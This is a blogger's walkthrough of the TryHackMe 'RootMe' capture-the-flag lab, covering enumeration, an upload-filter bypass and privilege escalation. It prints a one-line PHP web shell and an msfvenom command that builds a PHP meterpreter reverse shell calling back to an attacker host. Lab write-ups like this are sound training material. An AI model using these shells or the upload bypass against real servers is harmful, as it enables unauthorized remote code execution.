Intro
Hi, after some time, I write again a small WriteUp. Today it's about the CTF "RootMe". This CTF-Challenge can be found at the platform TryHackMe. You have to find 2 flags in this challenge. Here to simply create an account, and off you go 😛
Footprinting & Enumerating
Ok, let's go! First, as always, I did a portscan to see what services are running on the machine.
Here you can see that 2 services are running, one SSH and one HTTP server. It is interesting that a PHP session is simply started here. This service we look at first 😀
I first just went to the HTTP server to look at the page.
Ok, looks quite nice. Let's have a look at the source code of the page to find possible vulnerabilities 😀
OK, it loads a CSS and a JS, which we realize doesn't help us, too bad too. The most useful thing to do now would be to use Nikto and GoBuster to check the page for vulnerabilities, hidden directories and files.
- Nikto v2.1.6
Target IP: 10.10.125.186
Target Hostname: 10.10.125.186
Target Port: 80
+ Start Time: 2020-11-27 16:45:35 (GMT1)
Server: Apache/2.4.29 (Ubuntu)
Cookie PHPSESSID created without the httponly flag
The anti-clickjacking X-Frame-Options header is not present.
The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
No CGI Directories found (use '-C all' to force check all possible dirs)
Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
Web Server returns a valid response with junk HTTP methods, this may cause false positives.
OSVDB-3268: /css/: Directory indexing found.
OSVDB-3092: /css/: This might be interesting…
OSVDB-3233: /icons/README: Apache default file found.
/panel/: Admin login page/section found.
7889 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2020-11-27 16:51:25 (GMT1) (350 seconds)
1 host(s) tested
Nikto, shows here that there is a directory "/panel/" which could possibly be an admin panel. Let's have a look at that right away. Gobuster also shows this directory.
Initial access
We even see that there is a directory "/uploads". This points to fileuploads. Ok, if we go to the directory, we get this page.
And fact, we are dealing with a fileupload. The only question is whether we can also upload PHP files. Or, if there are any fileupload restrictions. For this we can already test a small shell.
<?php
echo system($_GET['cmd']);
?>
We simply upload these and intercept the request with BurpSuite. We now adjust them so that the content type is now an "image/jpeg".
After that we send the request and find out that the upload didn't work. It was blocked.
Ok, we can try changing the file extension to see if that works.
We'll pass that on as well, and see if it worked this time. Si!, it has worked.
Well, let's have a look in the directory "/uploads". Because that's where the shell should be.
That looks already quite good. The problem is that we can't do much with the file, because it is interpreted as JPEG by the browser. The best thing would be to check which extensions are available for PHP to save the file as a PHP file. Possible and valid file extensions for PHP would be:
- .php3
- .php4
- .php5
- .phtml
Let's try the extension .php3 😀 We notice that it worked. Let's look in the "/uploads" directory to see if it is there and if we can execute commands now. The file is there, but it is not interpreted. So we try the extension .php5.
Maintaining access
We see that it worked with the .php5 extension, which is because PHP5.x is still supported. We can see here under which user we have access on the system. From this point we create a meterpreter shell to have reasonable access on the system.
$ msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP> LPORT=4444 > msf.php5
This now upload, and should look like this in the end.
Now we start Metasploit and use the multi-handler to intercept the reverse TCP connection to interact with it later 😀
Now that we have access, we can look around the system and find the 2 flags. But before that, let's get a bash shell. This can be done quite fast with Python 😀
python -c "import pty; pty.spawn('/bin/bash')"
User Flag
When navigating to the directory "/var/www" to see if there are other directories, we find a file named "user.txt". Let's read it. Maybe we will find more clues.
Privilege Escalation
Oh, that's our first flag 😀 Ok, let's see how we can get root rights. The 2nd flag should be in the home directory of the root user, as usual. To do this, I list all SUID files, as usual, to see if there is anything that can be used for a privilege escalation.
What we notice is that Python has set the SUID bit. We can take advantage of that.
Rootflag
Well, now that we have root privileges, we can take a look at the root user's home directory to see if that's where our last flag is.
Ok, our last flag is there. Just read it out and we're done. That concludes the challenge.
This challenge was fun to do as I found it very refreshing. So for beginners this is definitely recommended 😀
I hope you enjoyed it and see you next time 😀